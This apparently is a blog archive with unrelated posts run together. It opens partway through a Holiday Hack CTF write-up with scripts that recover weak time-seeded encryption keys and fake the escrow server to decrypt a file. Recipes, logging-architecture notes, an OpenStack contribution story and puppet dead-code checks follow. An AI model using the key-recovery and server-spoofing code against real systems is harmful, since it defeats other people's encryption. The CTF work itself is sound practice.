            key = hex(fixed >> 0x10 & 0x7ffffff)[-2:]  # >> sar 16, & is and. We only want the last two bytes - the start look very similar..
            if 'x' in key:
                key = key.replace('x', '0')  # because movzx
            key = bytes.fromhex(key)
            keyarray.append(key[0])
        return(keyarray)  # last two
    return(rand())

seed = range(1575658800, 1575666001)
# so not off by 1 ^
for rseed in seed:
    two = msvcrt_rand(rseed)
    print(two.hex())
Trying to edit the hosts file. As I use WSL I learnt that for .exe files I also need to update Windows' hosts file, even though I run them from inside WSL! Also the syntax is NOT the following (the address has to come first, then the hostname):
localhost elfscrow.elfu.org
A bunch of false positives for some reason… when I use the list of keys I generated, my localhost flask API and the hosts file override. Anyway, I let this run and used file to stop when it found a PDF. It stopped at 4849 (or the 4850th key in keys[] in my python api.py, unsure if that is sorted..), so the creation time might have been 1575663650 (Friday, December 6, 2019 8:20:50 PM):
#!/bin/bash
# the Bruter
for i in $(seq 0 7200); do
    ./elfscrow.exe --decrypt --id=7debfae7-3a16-41e7-b211-678f5ebdce00 ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc out.pdf --insecure
    if [ -f out.pdf ]; then
        isitpdf=$(file out.pdf|grep -c PDF)
        if [ $isitpdf != 0 ]; then
            echo $isitpdf
            echo "GOT IT $i"
            exit 123
        else
            mv -v out.pdf "falses/$i.pdf"
        fi
    fi
done
And the api.py:
#https://stoplight.io/blog/python-rest-api/
from flask import Flask, json
import os
keys = ["b5ad6a321240fbec", "7200...", "7199", "..."]
api = Flask(__name__)
@api.route('/api/retrieve', methods=['POST'])
def get_companies():
    # store last key tested in a file
    statefile = "/root/elfscrow_status"
    with open(statefile, "r") as r:
        content = r.read()
    try:
        int(content)
    except ValueError:
        with open(statefile, "w+") as f:
            f.write("0")
        return("0")
    icontent = int(content)
    ncontent = int(content) + 1
    print("Last was %s, updating to %s" % (icontent, ncontent))
    with open(statefile, "w+") as f:
        f.write(str(ncontent))
    return str(keys[ncontent])
    #return json.dumps(companies)

if __name__ == '__main__':
    api.run(port=80)
Then to get the key it was just a pdf2txt and the 5-word sentence at the beginning of the document!
The username was found in https://srf.elfu.org/README.md
Started on this earlier but stopped because I wasn’t feeling it and it was a bit tedious.
Plan: make the queries programmatically. Also, this time, check the sizes of requests, maybe that's important. The time when attacks happen could be useful too?
Let's try out RITA as indicated in a hint; I also found Malcolm while looking up this tool.. could be fun. But at least RITA couldn't import the http.log :/
Weird that the IPs with the LFI, shellshock etc. haven't POSTed.. maybe they POSTed later?
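A start on the "programmatically" bit could be as small as this (assuming the http.log is Zeek's JSON export, one object per line): list which source IPs ever sent a POST and compare that against the IPs doing LFI/shellshock.
#!/usr/bin/python3
# List source IPs that ever POSTed, according to Zeek's JSON http.log.
import json

posters = set()
with open("http.log") as f:
    for line in f:
        line = line.strip()
        if not line:
            continue
        entry = json.loads(line)
        if entry.get("method") == "POST":
            ip = entry.get("id.orig_h")
            if ip:
                posters.add(ip)

for ip in sorted(posters):
    print(ip)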
Wow you made it all this way? Prepare for a bit of downer! :)
In the end I ran out of time. The end of the year approached, and some busy times in January 2020! It turned out I got quite far with a python script, but I think I had too many good IPs in my list. In the end I used a jq solution found in a writeup that is available in the Google cache, initially found by searching for the numbers used for the srand function in the elfscrow challenge.
Mix the cream, crushed tomatoes and spices. Pour the sauce into an oven dish that already has the tortellini and tomatoes in it. Feta cheese on top. Into the oven at 200 ℃ for ~18 min.
For version two: maybe better with ricotta, spinach and without the crushed tomatoes?
Take the frozen salmon out of the freezer.
Put everything into two pots, about 800 g in each. The amount of water you need is 'enough that it covers the food'. Boil the food.
When it's done, put 400 g of salmon into one pot and 400 g of chicken into the other.
Serves two
3 dl water and 3 dl milk. Whisk, and when it starts to steam, turn the heat down. Add 4 x 3/4 dl (12/4 or 3 dl) scoops of flakes (e.g. oat or four-grain). When it's almost done, take it off the heat and add salt.
Put the porridge into bowls, put butter in the middle and then some sugar.
Tadaa :)
Is there an open source thing out there I could use??
So if I only want to use mostly free and open source tools, there's a bunch of them one needs to glue together:
These days, for primary ingestion, I'd like to have BGP ECMP/anycast in front of the rsyslog receivers. These also run logstash (or a beat?). Or maybe one can have a load balancer up front which redirects traffic based on incoming port (and maybe a syslog tag for some 'authentication'?) to a set of log-parsing/rsyslog servers.
These would write to a Kafka cluster.
Then we would need more readers to stream events on to Elastic, SIEMs or Hadoop, or for example longer-term storage engines.
For the as-a-Service bit I'd like to play with Rundeck and have users configure most of the bits themselves. Logstash grokking/parsing needs outsourcing too, though. Fewer rules means more throughput, so it would be good to have different logstash processes for different logs. One could, like Loggly, direct users to ship logs with a tag to get them into the correct lane.
For reading, just Grafana and Kibana should be a good start.
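To make the Kafka-to-Elastic "reader" step a bit more concrete, here's a minimal sketch. The topic, broker and index names are made up, and kafka-python plus elasticsearch-py (8.x-style index call) are just one possible pairing:
#!/usr/bin/python3
# Consume JSON log events from a Kafka topic and index them into Elasticsearch.
import json

from kafka import KafkaConsumer
from elasticsearch import Elasticsearch

consumer = KafkaConsumer(
    "syslog-events",
    bootstrap_servers=["kafka1.example.org:9092"],
    value_deserializer=lambda raw: json.loads(raw.decode("utf-8")),
)
es = Elasticsearch(["http://elastic.example.org:9200"])

for message in consumer:
    # one document per log event; a real setup would batch and use date-based indices
    es.index(index="logs-demo", document=message.value)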
Croutons: Turn the oven on. Put the frozen bread in the microwave and warm it up. Cut it up and put it on a baking sheet. Mix with oil and garlic. Wait.
Mayonnaise: 1 dl rapeseed oil. One egg (unbroken) and a bit of mustard. Use an immersion blender (sauvasekoitin is the correct word). Put it in a small bowl and add garlic and salt.
Salad: small tomatoes, lettuce, one avocado, 400 g chicken fillet, just salted. Fry the chicken last, and when it's done put the croutons in the oven for a few minutes.
Serve with Parmigiano at the table.
Tadaa :)
Serves two
Instructions: Chop one yellow onion. Put it in a pot with oil. Blend the Turkish yoghurt and two avocados. Salt generously and add a bit of black pepper. Put the water on for the spaghetti.
Add the avocado mix to the onion. Grate half a block of Parmigiano and put almost all of it in the pot. The extra goes on the table.
Squeeze half a lemon into the pot. When it's warm it's done. Finally add the spaghetti to the pot. Check whether more salt and pepper is needed.
Serves two
Ingredients:
Instructions:
Turn the oven to 250 C. A block of feta into an oven dish, tomatoes around it. Chop the chilli and put it on top of the cheese. Plenty of oil over everything. Salt and pepper :) 25 min in the oven.
When the water is at 100 C, add salt and then the spaghetti.
When the tomatoes have burst, take the dish out of the oven and mix the feta and chilli. Combine everything.
Bon App!
How to rotate??
Ingredients:
Instructions:
Put the blueberries in a container and wait about an hour. After that, put all the other ingredients in the container and mix. Take care that the blueberries don't get more crushed than you want. Close the container and put it in the fridge overnight.
Enjoy in the morning!
Recently I had the pleasure of contributing upstream to the OpenStack project!
A link to my merged patches: https://review.opendev.org/#/q/owner:+guldmyr+status:merged
In a previous OpenStack summit (these days called OpenInfra Summits), (Vancouver 2018) I went there a few days early and attended the Upstream Institute https://docs.openstack.org/upstream-training/ .
It was 1.5 days long or so if I remember right. Looking up my notes from that these were the highlights:
Even though my patches came one baby and a bit over one year after the Upstream Institute, I could still figure things out quite quickly with the help of the guides and get bugs created and patches submitted. My general plan when first attending wasn't to contribute code changes, but rather to start reading code, perhaps find open bugs and so on.
The thing I wanted to change in puppet-keystone was apparently also possible to change in many other puppet-* modules, and less than a day after my puppet-keystone change got merged into master someone else picked up the torch and made PRs to like ~15 other repositories with similar changes :) Pretty cool!
Testing is hard! https://review.opendev.org/#/c/669045/1 is one backport I created for puppet-keystone/rocky, and the Ubuntu testing was not working initially (started with an APT mirror issue and later it was slow and timed out)… After 20 rechecks and two weeks, it still hadn’t successfully passed a test. In the end we got there though with the help of a core reviewer that actually updated some mirror and later disabled some tests :)
Now the change itself was about "oslo_middleware/max_request_body_size", so that we can increase it from the default 114688. The Pouta Cloud had issues where our Federation User Mappings were larger than 114688 bytes and we couldn't update them anymore; it turns out they were blocked by oslo_middleware.
(does anybody know where 114688 bytes comes from? Some internal speculation has been that it is 128 kilobytes minus some headers)
Anyway, the mapping we have now is simplified: just a long [ list ] of "local_username": "federation_email", domain: "default". I think the next step might be to figure out if we can make the rules using something like the below instead of hardcoding the values into the rules:
"name": "{0}"
It's been quite hard to find examples that are exactly like our use-case (and playing about with it is not a priority right now, just something in the backlog, but it could be interesting to look at when we start accepting more federations).
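For reference, a generic mapping rule along those lines might look like the JSON below. The remote attribute name MAIL is just a placeholder for whatever the identity provider actually sends, and whether this kind of rule fits our use-case is exactly the open question:
{
  "rules": [
    {
      "local": [
        { "user": { "name": "{0}", "domain": { "name": "Default" } } }
      ],
      "remote": [
        { "type": "MAIL" }
      ]
    }
  ]
}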
All in all, I’m really happy to have gotten to contribute something to the OpenStack ecosystem!
We use puppet at $dayjob to configure OpenStack.
I wanted to know if there’s a lot of unused code in our manifests!
**From left of stage enters: https://github.com/camptocamp/puppet-ghostbuster **
Step one is to install the puppet modules and gems and whatnot, this blog post was good about that: https://codingbee.net/puppet/puppet-identifying-dead-puppet-code-using-puppet-ghostbuster
Next I needed to get the HTTP forwarding of the puppetdb working, this can apparently (I learnt about ssh -J) be done with:
ssh -J jumphost.example.org INTERNALIPOFPUPPETMASTER -L 8081:localhost:8080
Then I set some variables pointing to hiera.yaml and the forwarded puppetdb:
PUPPETDB_URL=http://localhost:8081
HIERA_YAML=/tmp/hiera.yaml
Unsure if hiera.yaml works, just copied it in from the puppetmaster
Then run it:
find . -type f -name '*.pp' -exec puppet-lint --only-checks ghostbuster_classes,ghostbuster_defines,ghostbuster_facts,ghostbuster_files,ghostbuster_functions,ghostbuster_hiera_files,ghostbuster_templates,ghostbuster_types {} \+ | grep OURMODULE
Got some output! Are they correct?
./modules/OURMODULE/manifests/profile/apache.pp – WARNING: Class OURMODULE::Profile::Apache seems unused on line 6
But actually we have a role that contains:
class { 'OURMODULE::profile::apache': }
So I'm not sure what is up… But if I don't run all the ghostbuster checks and instead skip the ghostbuster_classes check, I get a lot fewer warnings for our module.
/modules/OURMODULE/manifests/profile/keystone/user.pp – WARNING: Define OURMODULE::Profile::Keystone::User seems unused on line 2
Looking in that one, we have an "OURMODULE::profile::keystone::user" define which calls keystone_user and keystone_user_role. We do call it, but like this:
OURMODULE::Profile::Keystone::User<| title == 'barbican' |>
Or in this other place:
create_resources(OURMODULE::profile::keystone::user, $users)
Let's look at the next one, which was also a create_resources call. Meh. Same same. And if I skip ghostbuster_defines? No errors :) Well, it was worth a shot. Some googling on the topic hints that it might not be possible with the way puppet works.